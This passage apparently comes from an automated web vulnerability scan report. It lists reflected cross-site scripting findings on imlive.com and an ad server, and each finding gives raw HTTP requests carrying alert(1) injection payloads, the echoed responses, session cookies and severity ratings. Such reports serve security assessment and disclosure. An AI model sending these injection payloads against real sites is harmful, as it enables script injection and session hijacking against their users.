GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011fca98"%3balert(1)//f842bdb5210& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:59 GMT
Server: Apache
Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT
ETag: "78afcc-cbd-4987b11732200"
Accept-Ranges: bytes
Content-Length: 6299
Content-Type: application/x-javascript

document.write( "<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028289011fca98";alert(1)//f842bdb5210&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\">
...[SNIP]...

4.477. http://imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 19502
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/?99c04"><a>b9169bf5b73=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.478. http://imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:41 GMT
Connection: close
Content-Length: 19663
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.479. http://imlive.com/SiteInformation.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/SiteInformation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:56 GMT
Connection: close
Content-Length: 8302
Vary: Accept-Encoding

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/652a8'onerror='alert(1)'f61ce20483c/&lr=1107816009&ud=0&pe=404.asp&qs=404;http://imlive.com:80/652a8'onerror='alert(1)'f61ce20483c/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.480. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 25222
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.481. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 25371
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.482. http://imlive.com/become_celeb.asp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/become_celeb.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 19702
Vary: Accept-Encoding

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/47df2'onerror='alert(1)'f893addb900/&lr=1107816008&ud=0&pe=404.asp&qs=404;http://imlive.com:80/47df2'onerror='alert(1)'f893addb900/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.483. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.484. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?8175d"><a>ad0c10fb84f=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.485. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
